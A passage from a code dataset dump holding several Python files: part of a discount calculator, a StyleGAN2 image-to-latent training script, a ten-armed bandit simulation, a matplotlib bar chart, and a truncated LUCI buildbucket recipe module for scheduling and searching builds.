price2.reverse()\n\n i = 0\n count = 0\n min = price2[i]\n tmp_mass = []\n price_mod = []\n for i in range(len(price2)):\n d = (i+1)%3\n tmp_mass.append(price2[i])\n if d == 0:\n\n price_mod.append(tmp_mass)\n tmp_mass = []\n #print(price_mod)\n i=0\n j=0\n\n dis_with = []\n for i in range(len(price_mod)):\n min = price_mod[i][j]\n for j in range(len(price_mod[i])):\n if price_mod[i][j] < min:\n min = price_mod[i][j]\n dis_with.append(min)\n\n #print('min in price /3= ',dis_with)\n return dis_with\n\n\n\n\n\ndef summ_discount(min_price): #суммарная скидка\n i=0\n summ = 0\n for i in range(len(min_price)):\n summ = summ+min_price[i]\n return summ\n\ndef discount_all(price): # ксидка для изачального price\n\n\n free_element = len(price) // 3\n\n price1 = sort_price(price)\n\n min_price = []\n\n tmp = 0\n\n i=0\n for i in range(free_element):\n min_price.append(price1[i])\n #print('min in price', min_price)\n return min_price\n\ndef sort_price(price): # сортировка от мин к макс\n i = 0\n price1 = []\n for i in range(len(price)):\n price1.append(price[i])\n i = 0\n while True:\n count = 0\n for i in range(len(price1)):\n if i < (len(price1) - 1):\n if price1[i + 1] < price1[i]:\n tmp = price1[i]\n price1[i] = price1[i + 1]\n price1[i + 1] = tmp\n count += 1\n if count == 0:\n break\n return price1\n\n#N = 7\n#price = [100,150,200,250,300,350,400]\n#d = MaximumDiscount(N, price)\n#print('otvet',d)\n","sub_path":"discount.py","file_name":"discount.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239847555","text":"import argparse\nfrom fastai.vision.all import get_image_files, imagenet_stats\nfrom pathlib import Path\nimport os\nimport re\n\nfrom torchvision import transforms\nimport torch\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom PIL import Image\n\nimport sys\nsys.path.append('/home')\n\n# our models for image to latent learning\nfrom Inversion.pytorch_stylegan_encoder.models.image_to_latent import ImageToLatent, ImageLatentDataset\nfrom 
asya_utils.model_tools.losses import LogCoshLoss\n\nimport wandb\n\n# for stylegan2 model\nfrom model import Generator\n\nimport setproctitle\nsetproctitle.setproctitle(\"[asya] - image2latent\")\n\ndef train(model, train_generator, validation_generator, optimizer, criterion, config, styleganmodel=None):\n if config.resume_checkpoint:\n print(\"resuming checkpoint\")\n step, min_validation_loss, model_state_dict = torch.load(config.checkpoint)\n model.load_state_dict(model_state_dict)\n else:\n step = 0\n min_validation_loss = float('inf')\n\n\n nb_images_to_show = 5\n validation_loss = 0.0\n one_time = 1\n\n progress_bar = tqdm(range(config.epochs))\n \n for epoch in progress_bar: \n running_loss = 0.0\n\n model.train()\n for i, (images_cpu, latents_cpu) in enumerate(train_generator, 1):\n optimizer.zero_grad()\n\n images, latents = images_cpu.cuda(), latents_cpu.cuda()\n \n #print(\"images :\", images)\n #print(\"imagse shape:\", images.shape)\n \n pred_latents = model(images)\n\n loss = criterion(pred_latents, latents)\n\n loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item()\n\n train_metrics = {'(Train) Average Running Loss': running_loss / i, 'Train Loss': loss.item()}\n\n wandb.log(train_metrics, step=step)\n\n progress_bar.set_description(\"Step: {0}, Loss: {1:4f}, Validation Loss: {2:4f}\".format(i, running_loss / i, validation_loss))\n\n # visualize images if we gave stylegan model as input\n if (styleganmodel is not None) and (i - 1) % 100 == 0:\n \n # let's visualize random images \n randinds = np.random.randint(0, pred_latents.shape[0], nb_images_to_show)\n\n output, _ = styleganmodel([pred_latents[randinds]], input_is_latent=True)\n pred_image = output.detach().clamp_(min=-1, max=1).add(1).div_(2)#.mul(255)#.to('cpu').numpy()\n pred_image = F.interpolate(pred_image, size=256).to('cpu')\n\n wandb.log({\"train images\": [wandb.Image(images_cpu[randinds], caption=\"real image\"), wandb.Image(pred_image, caption=\"predicted projection\")]}, step=step)\n\n if i % 5000 == 0:\n # save model\n print(\"saving model\")\n torch.save([step, min_validation_loss, model.state_dict()], '/mnt/datadrive/asya/checkpoints/stylegan2/latent_encoder/temp_checkpoint.pt')\n\n step += 1\n\n validation_loss = 0.0\n\n model.eval()\n for i, (images_cpu, latents_cpu) in enumerate(validation_generator, 1):\n with torch.no_grad():\n images, latents = images_cpu.cuda(), latents_cpu.cuda()\n\n pred_latents = model(images)\n loss = criterion(pred_latents, latents)\n\n validation_loss += loss.item()\n\n validation_loss /= i\n\n if styleganmodel is not None:\n # get nb_images_to_show random indexes\n randinds = np.random.randint(0, pred_latents.shape[0], nb_images_to_show)\n\n output, _ = styleganmodel([pred_latents[randinds]], input_is_latent=True)\n pred_image = output.detach().clamp_(min=-1, max=1).add(1).div_(2)#.mul(255)#.to('cpu').numpy()\n pred_image = F.interpolate(pred_image, size=256).to('cpu')\n wandb.log({\"validation images\": [wandb.Image(images_cpu[randinds], caption=\"real image\"), wandb.Image(pred_image, caption=\"predicted projection\")]}, step=step)\n\n valid_metrics = {'(Validation) Average Running Loss': validation_loss}\n wandb.log(valid_metrics, step=step)\n progress_bar.set_description(\"Step: {0}, Loss: {1:4f}, Validation Loss: {2:4f}\".format(i, running_loss / i, validation_loss))\n\n # we save our model at the end of each epoch if the validation loss has been improved\n if validation_loss < min_validation_loss:\n print(\"New best model, saving.\")\n # let's save this 
model \n            torch.save([step, min_validation_loss, model.state_dict()], config.checkpoint)\n    \n\ndef verify_basename(basename):\n    r = re.compile('latent_image_pairs_[0-9]{1,6}_[0-9]{1,4}_1[8]*')\n    if r.match(basename) is not None:\n        return True\n    \n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--basename', type=str, required=True, help='The basename of the image/latent pairs folder contained in the parent folder')\n    parser.add_argument('--parent', type=str, default='/home/datadrive/asya/datasets/StyleGAN2_ffhq_latent_image_pairs', help='This is the parent directory of all of our image/latent pairs. By default it is \"/home/datadrive/asya/datasets/StyleGAN2_latent_image_pairs\". The format of the subfolders containing the data here are all named latent_image_pairs_{nb_samples}_{image_size}_{latent_dimension}. This format must be respected.')\n    \n    parser.add_argument('--checkpoint_dir', type=str, default='/home/datadrive/asya/checkpoints/stylegan2/latent_encoder')\n    parser.add_argument('--stylegan_ckpt', type=str, default='/home/datadrive/asya/checkpoints/stylegan2/stylegan2-ffhq-config-f.pt')\n    parser.add_argument('--resume_training', default=False, action='store_true', help=\"if we want to resume training (from checkpoint: checkpoint_dir/image_to_latent.pt)\")\n    parser.add_argument('--batch_size', type=int, default=64)\n    parser.add_argument('--val_ratio', type=float, default=0.1)\n    parser.add_argument('--lr', type=float, default=0.0001)\n    \n    \n    args = parser.parse_args()\n    \n    if not verify_basename(args.basename):\n        raise ValueError(\"Please verify the basename argument (it must respect format 'latent_image_pairs_<nb_samples>_<im_size>_<latent_n>')\")\n    \n    _, _, _, nb_samples, im_size, latent_n = args.basename.split('_')\n    nb_samples = int(nb_samples)\n    im_size = int(im_size)\n    latent_n = int(latent_n)\n    \n    #####################\n    ### data loading: ###\n    #####################\n    \n    data_dir = Path(args.parent) / args.basename\n    if not os.path.exists(data_dir):\n        raise ValueError(\"Basename directory does not exist. 
Please verify.\")\n \n filenames = sorted(get_image_files(data_dir))\n dlatents = np.load(str(data_dir/'w.npy')) # shape: (nb_samples, 512) or (nb_samples, latent_n, 512) if latent_n != 1\n \n # this will be used to save checkpoints as well as to save the wandb files\n checkpoint_dir = Path(args.checkpoint_dir)\n \n \n #######################################\n #### hyperparameters + dataloaders ####\n #######################################\n \n val_ratio = args.val_ratio\n cutoff = int(nb_samples * (1 - val_ratio))\n batch_size = args.batch_size\n learning_rate = args.lr\n\n image_resize = 224 # this is so that resnet works\n \n augments = transforms.Compose([\n transforms.Resize(image_resize),\n transforms.ToTensor(),\n transforms.Normalize(mean=imagenet_stats[0], std=imagenet_stats[1])\n ])\n \n train_filenames = filenames[:cutoff]\n val_filenames = filenames[cutoff:]\n \n train_latents = dlatents[:cutoff]\n val_latents = dlatents[cutoff:]\n \n train_dataset = ImageLatentDataset(train_filenames, train_latents, transforms=augments)\n val_dataset = ImageLatentDataset(val_filenames, val_latents, transforms=augments)\n \n train_gen = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size)\n val_gen = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size)\n \n #####################\n ### define model ###\n #####################\n\n\n # Instantiate model\n\n image_to_latent = ImageToLatent(latent_n).cuda()\n optimizer = torch.optim.Adam(image_to_latent.parameters(), lr=learning_rate)\n criterion = LogCoshLoss() # this loss basically just compares the predicted latent to the true latent by doing an operation on their difference.\n\n # train model\n config = dict(\n epochs = 20,\n learning_rate = learning_rate,\n checkpoint = checkpoint_dir/'{}.pt'.format(args.basename),\n resume_checkpoint = args.resume_training\n )\n\n wandb.init(config=config, project=\"image_to_latent\", resume=args.resume_training, dir=str(checkpoint_dir))\n config = wandb.config\n wandb.watch(image_to_latent)\n\n # get the stylegan2 pretrained model \n args_dict = {}\n args_dict['device'] = 'cuda'\n args_dict['size'] = im_size\n args_dict['latent'] = 512\n args_dict['n_mlp'] = 8\n args_dict['n_latent'] = latent_n\n args_dict['channel_multiplier'] = 2\n args_dict['ckpt'] = args.stylegan_ckpt\n styleganmodel = Generator(\n args_dict['size'], args_dict['latent'], args_dict['n_mlp'], channel_multiplier=args_dict['channel_multiplier']\n ).to(args_dict['device'])\n checkpoint = torch.load(args_dict['ckpt'])\n styleganmodel.load_state_dict(checkpoint['g_ema'])\n\n train(image_to_latent, train_gen, val_gen, optimizer, criterion, config, styleganmodel)\n\n\n\n# ","sub_path":"Inversion/project/train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418814663","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass BanditEnv:\n\n def __init__(self, actions):\n self.q_star = [np.random.randn() for i in range(actions)]\n self.best_action = np.argmax(self.q_star)\n\n def get_reward(self, action):\n return self.q_star[action] + np.random.randn()\n\n\nclass BasicAgent:\n\n def __init__(self, alpha, epsilon, actions):\n self.alpha = alpha\n self.epsilon = epsilon\n self.Q = [0 for i in range(actions)]\n\n def take_action(self):\n if np.random.rand() < self.epsilon:\n return np.random.choice(len(self.Q))\n\n return np.argmax(self.Q)\n\n def update(self, action, 
reward):\n self.Q[action] = self.Q[action] + self.alpha * (reward - self.Q[action])\n\n\nclass Config:\n\n def __init__(self, alpha, epsilon, times, steps):\n self.alpha = alpha\n self.epsilon = epsilon\n self.times = times\n self.steps = steps\n\n\ndef simulate(config):\n rewards = np.zeros((config.times, config.steps))\n best_action_count = np.zeros((config.times, config.steps))\n\n for t in range(config.times):\n agent = BasicAgent(alpha=0.1, epsilon=config.epsilon, actions=10)\n environment = BanditEnv(actions=10)\n\n for s in range(config.steps):\n action = agent.take_action()\n reward = environment.get_reward(action)\n agent.update(action, reward)\n\n rewards[t, s] = reward\n best_action_count[t, s] = 1 if action == environment.best_action else 0\n\n return best_action_count.mean(axis=0), rewards.mean(axis=0)\n\n\ndef figure_2_2():\n epsilons = [0, 0.01, 0.1]\n results = []\n\n for epsilon_val in epsilons:\n configuration = Config(alpha=0.1, epsilon=epsilon_val, times=500, steps=2000)\n mean_best_action_count, mean_reward = simulate(configuration)\n results.append((epsilon_val, mean_best_action_count, mean_reward))\n\n plt.figure(figsize=(10, 20))\n plt.subplot(2, 1, 1)\n for item in results:\n plt.plot(range(len(item[2])), item[2], label='epsilon = %.02f' % item[0])\n plt.legend()\n\n plt.subplot(2, 1, 2)\n for item in results:\n plt.plot(range(len(item[1])), item[1], label='epsilon = %.02f' % item[0])\n plt.legend()\n\n plt.show()\n\n\nif __name__ == '__main__':\n figure_2_2()\n","sub_path":"chapter02/my_ten_armed_testbed.py","file_name":"my_ten_armed_testbed.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"68442172","text":"import math\nimport random \nimport matplotlib.pyplot as plt\n\nx = list(range(1,50))\ny1 = [math.sin(i/5)*10 for i in x]\ny2 = [math.cos(i/5)*10 for i in x]\ny3 = [random.randrange(1, 100, 1) for i in x]\n\nplt.bar(x, y3, label='Ages Bar', color='#ffe600')\nplt.xlabel('Person No')\nplt.ylabel('Age')\nplt.title('Age Chart')\nplt.legend()\nplt.show()\n\n","sub_path":"Matplotlib/Simple_Bar_Chart.py","file_name":"Simple_Bar_Chart.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602775933","text":"# Copyright 2017 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\n\"\"\"API for interacting with the buildbucket service.\n\nRequires `buildbucket` command in `$PATH`:\nhttps://godoc.org/go.chromium.org/luci/buildbucket/client/cmd/buildbucket\n\n`url_title_fn` parameter used in this module is a function that accepts a\n`build_pb2.Build` and returns a link title.\nIf it returns `None`, the link is not reported. Default link title is build id.\n\"\"\"\n\nimport json\n\nfrom google import protobuf\nfrom google.protobuf import field_mask_pb2\nfrom google.protobuf import json_format\n\nfrom recipe_engine import recipe_api\n\nfrom PB.go.chromium.org.luci.buildbucket.proto import build as build_pb2\nfrom PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2\nfrom PB.go.chromium.org.luci.buildbucket.proto import rpc as rpc_pb2\nfrom . 
import util\n\n\nclass BuildbucketApi(recipe_api.RecipeApi):\n \"\"\"A module for interacting with buildbucket.\"\"\"\n\n HOST_PROD = 'cr-buildbucket.appspot.com'\n HOST_PROD_BEEFY = 'beefy-dot-cr-buildbucket.appspot.com'\n HOST_DEV = 'cr-buildbucket-dev.appspot.com'\n\n def __init__(\n self, property, legacy_property, mastername, buildername, buildnumber,\n revision, parent_got_revision, branch, patch_storage, patch_gerrit_url,\n patch_project, patch_issue, patch_set, issue, patchset, *args, **kwargs):\n super(BuildbucketApi, self).__init__(*args, **kwargs)\n self._service_account_key = None\n self._host = property.get('hostname') or self.HOST_PROD\n\n legacy_property = legacy_property or {}\n if isinstance(legacy_property, basestring):\n legacy_property = json.loads(legacy_property)\n self._legacy_property = legacy_property\n\n self._build = build_pb2.Build()\n if property.get('build'):\n json_format.Parse(\n json.dumps(property.get('build')),\n self._build,\n ignore_unknown_fields=True)\n self._bucket_v1 = 'luci.%s.%s' % (\n self._build.builder.project, self._build.builder.bucket)\n else:\n # Legacy mode.\n build_dict = legacy_property.get('build', {})\n self._bucket_v1 = build_dict.get('bucket', None)\n self.build.number = int(buildnumber or 0)\n self.build.created_by = build_dict.get('created_by', '')\n\n created_ts = build_dict.get('created_ts')\n if created_ts:\n self.build.create_time.FromDatetime(\n util.timestamp_to_datetime(float(created_ts)))\n\n if 'id' in build_dict:\n self._build.id = int(build_dict['id'])\n build_sets = list(util._parse_buildset_tags(build_dict.get('tags', [])))\n _legacy_builder_id(\n build_dict, mastername, buildername, self._build.builder)\n _legacy_input_gerrit_changes(\n self._build.input.gerrit_changes, build_sets, patch_storage,\n patch_gerrit_url, patch_project, patch_issue or issue,\n patch_set or patchset)\n _legacy_input_gitiles_commit(\n self._build.input.gitiles_commit, build_dict, build_sets,\n revision or parent_got_revision, branch)\n _legacy_tags(build_dict, self._build)\n\n self._next_test_build_id = 8922054662172514000\n\n @property\n def host(self):\n \"\"\"Hostname of buildbucket to use in API calls.\n\n Defaults to the hostname that the current build is originating from.\n \"\"\"\n return self._host\n\n @host.setter\n def host(self, value):\n self._host = value\n\n def set_buildbucket_host(self, host):\n \"\"\"DEPRECATED. Use host property.\"\"\"\n self.host = host\n\n def use_service_account_key(self, key_path):\n \"\"\"Tells this module to start using given service account key for auth.\n\n Otherwise the module is using the default account (when running on LUCI or\n locally), or no auth at all (when running on Buildbot).\n\n Exists mostly to support Buildbot environment. Recipe for LUCI environment\n should not use this.\n\n Args:\n * key_path (str): a path to JSON file with service account credentials.\n \"\"\"\n self._service_account_key = key_path\n\n @property\n def build(self):\n \"\"\"Returns current build as a `buildbucket.v2.Build` protobuf message.\n\n For value format, see `Build` message in\n [build.proto](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n\n DO NOT MODIFY the returned value.\n Do not implement conditional logic on returned tags; they are for indexing.\n Use returned `build.input` instead.\n\n Pure Buildbot support: to simplify transition to buildbucket, returns a\n message even if the current build is not a buildbucket build. 
Provides as\n much information as possible. Some fields may be left empty, violating\n the rules described in the .proto files.\n If the current build is not a buildbucket build, returned `build.id` is 0.\n \"\"\"\n return self._build\n\n @property\n def builder_name(self):\n \"\"\"Returns builder name. Shortcut for `.build.builder.builder`.\"\"\"\n return self.build.builder.builder\n\n def build_url(self, host=None, build_id=None):\n \"\"\"Returns url to a build. Defaults to current build.\"\"\"\n return 'https://%s/build/%s' % (\n host or self._host, build_id or self._build.id)\n\n @property\n def gitiles_commit(self):\n \"\"\"Returns input gitiles commit. Shortcut for `.build.input.gitiles_commit`.\n\n For value format, see\n [`GitilesCommit` message](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto).\n\n Never returns None, but sub-fields may be empty.\n \"\"\"\n return self.build.input.gitiles_commit\n\n def is_critical(self, build=None):\n \"\"\"Returns True if the build is critical. Build defaults to the current one.\n \"\"\"\n build = build or self.build\n return build.critical in (common_pb2.UNSET, common_pb2.YES)\n\n @property\n def tags_for_child_build(self):\n \"\"\"A dict of tags (key -> value) derived from current (parent) build for a\n child build.\"\"\"\n original_tags = {t.key: t.value for t in self.build.tags}\n new_tags = {'user_agent': 'recipe'}\n\n # TODO(nodir): switch to ScheduleBuild API where we don't have to convert\n # build input back to tags.\n # This function returns a dict, so there can be only one buildset, although\n # we can have multiple sources.\n # Priority: CL buildset, commit buildset, custom buildset.\n commit = self.build.input.gitiles_commit\n if self.build.input.gerrit_changes:\n cl = self.build.input.gerrit_changes[0]\n new_tags['buildset'] = 'patch/gerrit/%s/%d/%d' % (\n cl.host, cl.change, cl.patchset)\n\n # Note: an input gitiles commit with ref without id is valid\n # but such commit cannot be used to construct a valid commit buildset.\n elif commit.host and commit.project and commit.id:\n new_tags['buildset'] = (\n 'commit/gitiles/%s/%s/+/%s' % (\n commit.host, commit.project, commit.id))\n if commit.ref:\n new_tags['gitiles_ref'] = commit.ref\n else:\n buildset = original_tags.get('buildset')\n if buildset:\n new_tags['buildset'] = buildset\n\n if self.build.number:\n new_tags['parent_buildnumber'] = str(self.build.number)\n if self.build.builder.builder:\n new_tags['parent_buildername'] = str(self.build.builder.builder)\n return new_tags\n\n def set_output_gitiles_commit(self, gitiles_commit):\n \"\"\"Sets `buildbucket.v2.Build.output.gitiles_commit` field.\n\n This will tell other systems, consuming the build, what version of the code\n was actually used in this build and what is the position of this build\n relative to other builds of the same builder.\n\n Args:\n * gitiles_commit(buildbucket.common_pb2.GitilesCommit): the commit that was\n actually checked out. 
Must have host, project and id.\n ID must match r'^[0-9a-f]{40}$' (git revision).\n If position is present, the build can be ordered along commits.\n Position requires ref.\n Ref, if not empty, must start with `refs/`.\n\n Can be called at most once per build.\n \"\"\"\n # Validate commit object.\n c = gitiles_commit\n assert isinstance(c, common_pb2.GitilesCommit), c\n\n assert c.host\n assert '/' not in c.host, c.host\n\n assert c.project\n assert not c.project.startswith('/'), c.project\n assert not c.project.startswith('a/'), c.project\n assert not c.project.endswith('/'), c.project\n\n assert c.ref.startswith('refs/'), c.ref\n assert not c.ref.endswith('/'), c.ref\n\n assert util.is_sha1_hex(c.id), c.id\n\n # position is uint32\n # Does not need extra validation.\n\n # The fact that it sets a property value is an implementation detail.\n res = self.m.step('set_output_gitiles_commit', cmd=None)\n prop_name = '$recipe_engine/buildbucket/output_gitiles_commit'\n res.presentation.properties[prop_name] = json_format.MessageToDict(\n gitiles_commit)\n\n def tags(self, **tags):\n \"\"\"Alias for tags in util.py. See doc there.\"\"\"\n return util.tags(**tags)\n\n @property\n def builder_cache_path(self):\n \"\"\"Path to the builder cache directory.\n\n Such directory can be used to cache builder-specific data.\n It remains on the bot from build to build.\n See \"Builder cache\" in\n https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/project_config.proto\n \"\"\"\n return self.m.path['cache'].join('builder')\n\n # RPCs.\n\n def _default_field_mask(self, path_prefix=''):\n \"\"\"Returns a default FieldMask message to use in requests.\"\"\"\n paths = [\n 'builder',\n 'create_time',\n 'created_by',\n 'critical',\n 'end_time',\n 'id',\n 'input',\n 'number',\n 'output',\n 'start_time',\n 'status',\n 'update_time',\n ]\n return field_mask_pb2.FieldMask(paths=[path_prefix + p for p in paths])\n\n def run(\n self, schedule_build_requests, collect_interval=None, timeout=None,\n url_title_fn=None, step_name=None, raise_if_unsuccessful=False):\n \"\"\"Runs builds and returns results.\n\n A shortcut for schedule() and collect_builds().\n See their docstrings.\n\n Returns:\n A list of completed\n [Builds](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n in the same order as schedule_build_requests.\n \"\"\"\n with self.m.step.nest(step_name or 'buildbucket.run'):\n builds = self.schedule(\n schedule_build_requests, step_name='schedule',\n url_title_fn=url_title_fn)\n build_dict = self.collect_builds(\n [b.id for b in builds],\n interval=collect_interval,\n timeout=timeout,\n step_name='collect',\n raise_if_unsuccessful=raise_if_unsuccessful,\n # Do not print links. 
self.schedule printed them already.\n url_title_fn=lambda b: None,\n )\n return [build_dict[b.id] for b in builds]\n\n def schedule_request(\n self,\n builder,\n project=None,\n bucket=None,\n properties=None,\n experimental=None,\n gitiles_commit=None,\n gerrit_changes=None,\n tags=None,\n inherit_buildsets=True,\n dimensions=None,\n priority=None,\n critical=None,\n exe_cipd_version=None,\n ):\n \"\"\"Creates a new `ScheduleBuildRequest` message with reasonable defaults.\n\n This is a convenient function to create a `ScheduleBuildRequest` message.\n\n Among args, messages can be passed as dicts of the same structure.\n\n Example:\n\n request = api.buildbucket.schedule_request(\n builder='linux',\n tags=api.buildbucket.tags(a='b'),\n )\n build = api.buildbucket.schedule([request])[0]\n\n Args:\n * builder (str): name of the destination builder.\n * project (str): project containing the destinaiton builder.\n Defaults to the project of the current build.\n * bucket (str): bucket containing the destination builder.\n Defaults to the bucket of the current build.\n * properties (dict): input properties for the new build.\n * experimental: whether the build is allowed to affect prod.\n If not None, must be `common_pb2.Trinary` or bool.\n Defaults to the value of the current build.\n Read more about\n [`experimental` field](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=\"bool experimental\").\n * gitiles_commit (common_pb2.GitilesCommit): input commit.\n Defaults to the input commit of the current build.\n Read more about\n [`gitiles_commit`](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=Input.gitiles_commit).\n * gerrit_changes (list or common_pb2.GerritChange): list of input CLs.\n Defaults to gerrit changes of the current build.\n Read more about\n [`gerrit_changes`](https://cs.chromium.org/chromium/infra/go/src/go.chromium.org/luci/buildbucket/proto/build.proto?q=Input.gerrit_changes).\n * tags (list or common_pb2.StringPair): tags for the new build.\n * inherit_buildsets (bool): if `True` (default), the returned request will\n include buildset tags from the current build.\n * dimensions (list of common_pb2.RequestedDimension): override dimensions\n defined on the server.\n * priority (int): Swarming task priority.\n The lower the more important. Valid values are `[20..255]`.\n Defaults to the value of the current build.\n * critical: whether the build status should not be used to assess\n correctness of the commit/CL.\n Defaults to .build.critical.\n See also Build.critical in\n https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto\n * exe_cipd_version: CIPD version of the LUCI Executable (e.g. 
recipe) to use\n instead of the server-configured one.\n \"\"\"\n\n\n def as_msg(value, typ):\n assert isinstance(value, (dict, protobuf.message.Message)), type(value)\n if isinstance(value, dict):\n value = typ(**value)\n return value\n\n def copy_msg(src, dest):\n dest.CopyFrom(as_msg(src, type(dest)))\n\n def as_trinary(value):\n assert isinstance(value, (bool, int))\n if isinstance(value, bool):\n value = common_pb2.YES if value else common_pb2.NO\n return value\n\n b = self.build\n req = rpc_pb2.ScheduleBuildRequest(\n request_id='%d-%s' % (b.id, self.m.uuid.random()),\n builder=dict(\n project=project or b.builder.project,\n bucket=bucket or b.builder.bucket,\n builder=builder,\n ),\n priority=priority or b.infra.swarming.priority,\n experimental=b.input.experimental,\n critical=b.critical,\n fields=self._default_field_mask(),\n )\n if exe_cipd_version:\n req.exe.cipd_version = exe_cipd_version\n req.properties.update(properties or {})\n\n if experimental is not None:\n req.experimental = as_trinary(experimental)\n\n if critical is not None:\n req.critical = as_trinary(critical)\n\n # Populate commit.\n if not gitiles_commit and b.input.HasField('gitiles_commit'):\n gitiles_commit = b.input.gitiles_commit\n if gitiles_commit:\n copy_msg(gitiles_commit, req.gitiles_commit)\n\n # Populate CLs.\n if gerrit_changes is None:\n gerrit_changes = b.input.gerrit_changes\n for c in gerrit_changes:\n copy_msg(c, req.gerrit_changes.add())\n\n # Populate tags.\n tag_set = {('user_agent', 'recipe')}\n for t in tags or []:\n t = as_msg(t, common_pb2.StringPair)\n tag_set.add((t.key, t.value))\n\n if inherit_buildsets:\n for t in b.tags:\n if t.key == 'buildset':\n tag_set.add((t.key, t.value))\n\n # TODO(tandrii, nodir): find better way to communicate cq_experimental\n # status to Gerrit Buildbucket plugin.\n for t in b.tags:\n if t.key == 'cq_experimental':\n tag_set.add((t.key, t.value))\n\n for k, v in sorted(tag_set):\n req.tags.add(key=k, value=v)\n\n for d in dimensions or []:\n copy_msg(d, req.dimensions.add())\n\n return req\n\n def schedule(\n self, schedule_build_requests, url_title_fn=None, step_name=None):\n \"\"\"Schedules a batch of builds.\n\n Example:\n ```python\n req = api.buildbucket.schedule_request(builder='linux')\n api.buildbucket.schedule([req])\n ```\n\n Hint: when scheduling builds for CQ, let CQ know about them:\n ```python\n api.cq.record_triggered_builds(*api.buildbucket.schedule([req1, req2]))\n ```\n\n Args:\n * schedule_build_requests: a list of `buildbucket.v2.ScheduleBuildRequest`\n protobuf messages. Create one by calling `schedule_request` method.\n * url_title_fn: generates a build URL title. 
See module docstring.\n * step_name: name for this step.\n\n Returns:\n A list of\n [`Build`](https://chromium.googlesource.com/infra/luci/luci-go/+/master/buildbucket/proto/build.proto)\n messages in the same order as requests.\n\n Raises:\n `InfraFailure` if any of the requests fail.\n \"\"\"\n assert isinstance(schedule_build_requests, list), schedule_build_requests\n for r in schedule_build_requests:\n assert isinstance(r, rpc_pb2.ScheduleBuildRequest), r\n if not schedule_build_requests:\n return []\n\n batch_req = rpc_pb2.BatchRequest(\n requests=[dict(schedule_build=r) for r in schedule_build_requests]\n )\n\n test_res = rpc_pb2.BatchResponse()\n for r in schedule_build_requests:\n test_res.responses.add(\n schedule_build=dict(\n id=self._next_test_build_id,\n builder=r.builder,\n )\n )\n self._next_test_build_id += 1\n\n step_res, batch_res, has_errors = self._batch_request(\n step_name or 'buildbucket.schedule', batch_req, test_res)\n\n # Append build links regardless of errors.\n for r in batch_res.responses:\n if not r.HasField('error'):\n self._report_build_maybe(\n step_res, r.schedule_build, url_title_fn=url_title_fn)\n\n if has_errors:\n raise self.m.step.InfraFailure('Build creation failed')\n\n # Return Build messages.\n return [r.schedule_build for r in batch_res.responses]\n\n def _report_build_maybe(self, step_result, build, url_title_fn=None):\n \"\"\"Reports a build in the step presentation.\n\n url_title_fn is a function that accepts a `build_pb2.Build` and returns a\n link title. If returns None, the link is not reported.\n Default link title is build id.\n \"\"\"\n build_title = url_title_fn(build) if url_title_fn else build.id\n if build_title is not None:\n pres = step_result.presentation\n pres.links[str(build_title)] = self.build_url(build_id=build.id)\n\n def put(self, builds, **kwargs):\n \"\"\"Puts a batch of builds.\n\n DEPRECATED. Use `schedule()` instead.\n\n Args:\n * builds (list): A list of dicts, where keys are:\n * 'bucket': (required) name of the bucket for the request.\n * 'parameters' (dict): (required) arbitrary json-able parameters that a\n build system would be able to interpret.\n * 'experimental': (optional) a bool indicating whether build is\n experimental. If not provided, the value will be determined by whether\n the currently running build is experimental.\n * 'tags': (optional) a dict(str->str) of tags for the build. These will\n be added to those generated by this method and override them if\n appropriate. 
If you need to remove a tag set by default, set its value\n to `None` (for example, `tags={'buildset': None}` will ensure build is\n triggered without `buildset` tag).\n\n Returns:\n A step that as its `.stdout` property contains the response object as\n returned by buildbucket.\n \"\"\"\n build_specs = []\n for build in builds:\n build_specs.append(self.m.json.dumps({\n 'bucket': build['bucket'],\n 'parameters_json': self.m.json.dumps(build['parameters']),\n 'tags': self._tags_for_build(build['bucket'], build['parameters'],\n build.get('tags')),\n 'experimental': build.get('experimental',\n self.m.runtime.is_experimental),\n }))\n return self._run_buildbucket('put', build_specs, **kwargs)\n\n def search(self, predicate, limit=None, url_title_fn=None, step_name=None):\n \"\"\"Searches for builds.\n\n Example: find all builds of the current CL.\n\n ```python\n from PB.go.chromium.org.luci.buildbucket.proto import rpc as rpc_pb2\n\n related_builds = api.buildbucket.search(rpc_pb2.BuildPredicate(\n gerrit_changes=list(api.buildbucket.build.input.gerrit_changes),\n ))\n ```\n\n Args:\n * predicate: a `rpc_pb2.BuildPredicate` object or a list thereof.\n If a list, the predicates are connected with logical OR.\n * limit: max number of builds to return. Defaults to 1000.\n * url_title_fn: generates a build URL title. See module docstring.\n\n Returns:\n A list of builds ordered newest-to-oldest.\n \"\"\"\n assert isinstance(predicate, (list, rpc_pb2.BuildPredicate)), predicate\n if not isinstance(predicate, list):\n predicate = [predicate]\n assert all(isinstance(p, rpc_pb2.BuildPredicate) for p in predicate)\n assert isinstance(limit, (type(None), int))\n assert limit is None or limit >= 0\n\n limit = limit or 1000\n\n batch_req = 